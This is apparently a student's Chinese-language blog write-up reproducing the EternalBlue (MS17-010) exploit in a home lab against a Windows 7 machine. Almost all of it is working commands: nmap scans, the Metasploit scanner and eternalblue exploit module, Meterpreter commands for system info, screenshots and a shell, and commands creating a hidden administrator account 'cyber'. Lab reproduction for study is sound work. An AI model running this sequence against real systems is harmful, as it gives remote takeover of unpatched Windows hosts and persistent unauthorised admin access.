永恒之蓝ms17_010复现

---

永恒之蓝ms17_010

2017年5月12日起，全球范围内爆发基于Windows网络共享协议进行攻击传播的蠕虫恶意代码，这是不法分子通过改造之前泄露的NSA黑客武器库中“永恒之蓝”攻击程序发起的网络攻击事件。五个小时内，包括英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招，被勒索支付高额赎金才能解密恢复文件，对重要数据造成严重损失。

来源于：百度百科

---

环境：

攻击机：kali linux
靶机：win 7 企业版

---

1 主机存活扫描

nmap -sP 192.168.241.0/24

2 主机端口扫描

nmap -sV -Pn -v -T4 192.168.241.136

win 7? 端口 445?

3 永恒之蓝ms17_010复现

msf开起来

msfconsole
search ms17_010
use auxiliary/scanner/smb/smb_ms17_010
show options
set THREADS 40
set RHOST 192.168.241.136
run

ok 可以利用

use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 192.168.241.136
exploit

取得meterpreter控制台

没啥好说的，信息收集
meterpreter > sysinfo
meterpreter > getuid
meterpreter > screenshot
meterpreter > shell

获取win 7桌面截图

接着是windows 7提权
自己是管理员，那么我增加一个用户cyber ,并将他加入到管理员组

whoami                         //当前用户
net user                       //查看存在用户
net user cyber cyber /add      //增加一个名为cyber的用户
net localgroup administrators cyber /add    //把cyber用户加到用户组

win7打开计算机管理

可以发现，cyber已经是管理员用户组的一员了
接下来则是后门和痕迹清理（暂时鸽了）

---

原本没去做永恒之蓝的想法，但是作业。。。一言难尽啊（可能这就是学业上的差距吧）

没办法，得给自己加工，于是有永恒之蓝的想法。